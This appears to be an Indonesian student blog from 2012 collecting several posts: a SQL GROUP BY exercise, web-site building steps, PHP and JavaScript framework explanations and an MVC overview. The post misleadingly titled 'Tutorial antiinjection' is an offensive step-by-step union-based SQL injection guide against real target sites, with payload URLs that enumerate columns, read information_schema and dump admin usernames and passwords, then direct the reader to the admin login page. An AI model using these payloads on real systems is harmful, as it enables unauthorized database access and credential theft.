Jumat, 04 Mei 2012

Mencari nilai max dan min

SOAL RESPONSI :
Membuat query untuk group dan mencari nilai max n min pada group itu ( lelang barang )

Klausa Group By
Klausa group by akan mengumpulkan baris data dari tabel sesuai dengan kolom yang
dispesifikasikan dan memperkenankan adalah fungsi agregasi pada satu atau lebih kolom.
Untuk lebih jelas dapat dilihat pada contoh berikut:

SELECT MAX (harga), barang
FROM lelangbarang
GROUP BY barang;
Mencari nilai min :
SELECT MIN (harga), barang
FROM lelangbarang
GROUP BY barang;

Query ini akan mengambil dan menampilkan nilai maksimum & minimum dari lelang dari tiap
Lelang barang dan dikelompokkan berdasarkan nama barang

Download PDF Responsi

Kamis, 03 Mei 2012

Tutorial antiinjection

Pengertian anti sql injection:

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+inf ormation_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .

Download PDF nya Disini


Download PDF antiinjection yang lain

Langkah Pembuatan WEB

Langkah-langkah Dalam Pembuatan Web Site
Setelah Anda membuat desain-nya maka yang harus segera Anda lakukan adalah mendaftarkan pada salah satu free web server untuk menempatkan desain kita. Untuk itu Anda bisa memilih pada salah satu free web server yang ada yang alamatnya terletak di bawah ini.
Terdapat dua macam free web server yaitu yang mengijinkan untuk akses ke direktori cgi-bin dan free web server yang tidak mengijinkan akses ke direktori tersebut. Dengan akses ke cgi-bin maka kita bisa menempatkan script kita sendiri. Misalnya script untuk buku tamu, mailing list, counter, dll. Dengan script yang dibuat sendiri maka Anda bisa membuat buku tamu tanpa perlu dijejali dengan iklan.
Tapi sebelum melakukan upload (mengirim file ke server) Anda bisa melengkapi web site Anda dengan :
Buku Tamu
Sehingga para netter yang mampir ke situs Anda dapat meninggalkan pesan, kritik atau sekedar komentar mengenai web Anda.

Counter
Dengan counter Anda bisa mengetahui berapa orang yang telah berkunjung ke situs Anda.

Mailing List
Kalau situs Anda dirasa berbobot Anda bisa melengkapi dengan mailing list. Sehingga orang yang terdaftar pada mailing list situs Anda akan mengetahui (misalnya) kapan situs tersebut di update.
Apa itu langkah-langkah dalam pembuatan web site, tentunya sobat penasaran juga yaaach, yang pertama biasanya kita desain web kita dlu supaya kelihatan menarik, selanjutnya kita mendaftarkan pada salah satu free web server untuk menempatkan desain kita. Untuk itu sobat bisa memilih pada salah satu free web server yang ada yang alamatnya terletak di bawah ini. Terdapat dua macam free web server yaitu yang mengijinkan untuk akses ke direktori cgi-bin dan free web server yang tidak mengijinkan akses ke direktori tersebut. Dengan akses ke cgi-bin maka kita bisa menempatkan script kita sendiri. Misalnya script untuk buku tamu, mailing list, counter, dll. Dengan script yang dibuat sendiri maka Anda bisa membuat buku tamu tanpa perlu dimasuki iklan.


Download PDF Langkah Pembuatan

Pengertian Framework PHP

Pernah dengar tentang CodeIgniter, ZendFramework, Cake PHP, atau Yii Framework?? Mungkin yang sudah level master sudah tidak asing lagi dengan istilah framework PHP. Sebenarnya apa itu framework PHP? Dan bagaimana tools ini bisa mempermudah para programer?. Berikut saya akan coba jelaskan apa itu framework PHP.
Dalam bahasa Inggris, framework berati kerangka kerja. Sementara secara harfiah, framework dapat diartikan sebagai sebuah tools atau alat yang berfungsi untuk membantu sebuah pekerjaan. Karena PHP adalah script untuk membuat website, maka framework PHP dalam kasus ini bisa diartikan sebagai alat yang berfungsi untuk mempermudah proses pembuatan sebuah website. Lalu apa bedanya dengan Content Management System (CMS), seperti WordPress, Joomla!, dan sejenisnya?. Berikut saya jelaskan sedikit perbedaan CMS dengan framework.
CMS menawarkan sebuah management website yang lengkap, end-user friendly. Jika membangun website dengan sebuah Content Management System, maka kita tinggal menjalankan engine dari CMS itu saja. Kita sebagai pengembang tidak perlu lagi memikirkan proses coding, penyusunan logika, dan proses menulis kode program sendiri.
Lain soal saat kita memakai framework PHP. Saat kita memutuskan menggunakan framework sebagai pondasi proses pembuatan website, kita masih harus menulis kode, menyusun logika program. Bedanya, kode-kode yang kita tulis harus menyesuaikan dengan lingkungan framework yang kita gunakan. Kita harus menyesuaikan pattern-pattern (pola) yang sudah menjadi acuan dalam suatu framework. Ya, konsekuensi dari menggunakan framework adalah kita harus mempelajari lagi lingkungan pengembangan, aturan-aturan, dan pola pengkodean berdasarkan framework yang kita gunakan. Akan tetapi, hal tersebut dirasa wajar dan akan terbayar lunas setelah kita benar-benar menguasai dan bisa menggunakan framework tersebut.

FRAMEWORK PHP KONFIGURASI
Pengenalan Framework PHP CodeIgniter, Bab Konfigurasi CodeIgniter
Introduction to PHP Framework CodeIgniter, CodeIgniter Configuration Chapter

Sebelumnya pertama-tama download CI terbaru dari web nya yaitu codeigniter.com

CodeIgniter tidak terlalu sulit, apalagi bagi anda yang sudah menguasai PHP dan lebih mudah lagi apabila anda memahami PHP yang berbasis OOP(Object Oriented Programming) maupun konsep MVC(Model View Controller). Framework Codeigniter berbasiskan konsep MVC yang memudahkan programmer dalam mengolah data.

Sebelum memulai membangun aplikasi web, alangkah baiknya mengetahui konfigurasi awal yang harus dilakukan sebelum menggunakan framework Codeigniter ini.

FRAMEWORK JAVASCRIPT

Apa Framework Javascript itu?!
Sebelum mengenal Framework Javascript sebaiknya kita mengenal arti umum dari Framework itu sendiri. Framework, jika diterjemahkan ke bahasa kita, bisa berarti “area kerja”, atau “lingkungan kerja”. Dalam bahasa susahnya, berarti sebuah area kerja yang sudah disediakan fungsi-fungsi yang kita tinggal menggunakannya. Jadi tidak perlu lagi membuatnya dari awal.

Analoginya, seperti kita menyewa sebuah kantor yang didalamnya sudah terdapat semua macam kebutuhan kantor seperti telepon, meja kerja, ruangan, dapur, dan lain-lain. Nah, Framework ini juga berarti sama. Sebuah framework sudah banyak menyediakan kegunaan-kegunaan yang dengan mudah kita gunakan.
Framework inilah yang kini menjadi trend di dunia pemrograman. Tidak hanya di Javascript, tapi juga di PHP. Dan pengertian Framework semua sama.

Jadi, Framework Javascript itu sendiri adalah sebuah tool yang di gunakan pada bahasa pemrograman javascript untuk mempermudah dalam penggunaannya.
Awal pengembangan Framework Javacript dimulai saat memasuki era Web 2.0, generasi kedua dari layanan berbasis web dimana
lebih meniktikberatkan pada kolaborasi online, sharing content antar pengguna dan lebih terarah ke User Content Generated.
Nah, berdasarkan kebutuhan akan konsep dan paradigma baru dalam pengembangan aplikasi berbasis web tersebut maka dalam pengembangannya diperlukan suatu sistem alur kerja yang bisa memudahkan dalam menciptakan aplikasi berbasis web yang canggih dan interaktif. Salah satu yang sering digunakan para developer tersebut adalah JavaScript Framework/Libraries dimana didalamnya terdapat JavaScript yang telah ditulis sedemikian rupa dimana sangat membantu dalam pengembangan sebuah Aplikasi Web, terutama dalam pengembangan AJAX (Asynchronous JavaSript And XML). Sebuah teknik pemanggilan cepat tanpa melakukan reload terhadap suatu page.

Dengan JavaScript Libraries tersebut para programmer bisa dengan
mudah mengimplementasikan paradigma WEB 2.0 yang baru seperti User interface yang dinamik dan sangat interaktif kepada usernya.

Download PDF Framework

Pengenalan WVC

MVC Dari Wikipedia bahasa Indonesia
Konsep Model-View-Controller Model-View-Controller atau MVC adalah sebuah metode untuk membuat sebuah aplikasi dengan memisahkan data (Model) dari tampilan (View) dan cara bagaimana memprosesnya (Controller). Dalam implementasinya kebanyakan framework dalam aplikasi website adalah berbasis arsitektur MVC.
MVC memisahkan pengembangan aplikasi berdasarkan komponen utama yang membangun sebuah aplikasi seperti manipulasi data, antarmuka pengguna, dan bagian yang menjadi kontrol dalam sebuah aplikasi web.[2] Sejarah MVC Model View Controller pertama sekali dipublikasikan oleh peneliti XEROX PARAC yang bekerja dalam pembuatan bahasa pemrograman Smalltalk sekitar tahun 1970-1980.
Bagian dari MVC
1. Model, Model mewakili struktur data. Biasanya model berisi fungsi-fungsi yang membantu seseorang dalam pengelolaan basis data seperti memasukkan data ke basis data, pembaruan data dan lain-lain.
2. View, View adalah bagian yang mengatur tampilan ke pengguna. Bisa di katakan berupa halaman web.
3. Controller, Controller merupakan bagian yang menjembatani model dan view. Controller berisi perintah-perintah yang berfungsi untuk memproses suatu data dan mengirimkannya ke halaman web. Dengan menggunakan metode MVC maka aplikasi akan lebih mudah untuk dirawat dan dikembangkan. Untuk memahami metode pengembangan aplikasi menggunakan MVC diperlukan pengetahuan tentang pemrograman berorientasi objek (Object Oriented Programming).
Jenis MVC pada website
•Server Side MVC, Server Side MVC biasa terjadi pada aplikasi web tradisional, yang tidak melibatkan client side seperti Javascript, Java applet, Flash, dan lain-lain. Server Side MVC menyerahkan keseluruhan proses bisnis pada server, aplikasi pada sisi pengguna hanya dapat menerima. MVC jenis ini kadang-kadang disebut juga dengan nama Thin Client.
•Mixed Client Side and Server Side MVC, Pada Mixed Client Side and Server Side MVC 1 client tidak menggunakan model sebagai jembatan untuk melakukan komunikasi pada server, dibandingkan dengan Server Side MVC, arsitektur ini memiliki tingkat kompleksitas yang lebih tinggi karena lebih banyak komponen yang terlibat. Untuk selanjutnya arsitektur ini disebut, dengan Mixed MVC 1. Pada Mixed Client Side and Server Side MVC 2, client menggunakan model sebagai jembatan untuk melakukan komunikasi pada server, dibandingkan dengan arsitektur MVC yang lain, arsitektur ini memiliki tingkat kompleksitas yang paling tinggi karena lebih banyak komponen yang terlibat, sehingga membutuhkan sumber daya yang lebih besar pula. Untuk selanjutnya arsitektur ini disebut dengan Mixed MVC 2.
•Rich Internet Application MVC, Application MVC Rich Internet Application (RIA) disebut juga dengan nama Fat Client, merupakan aplikasi web yang memiliki kemampuan dan fungsi hampir seperti aplikasi desktop. RIA pada sisi client, memiliki mesin untuk mengambil data yang berada pada server, sehingga pada client terdapat bagian MVC sendiri dan hanya membutuhkan bagian model pada sisi server

Download PDF MVC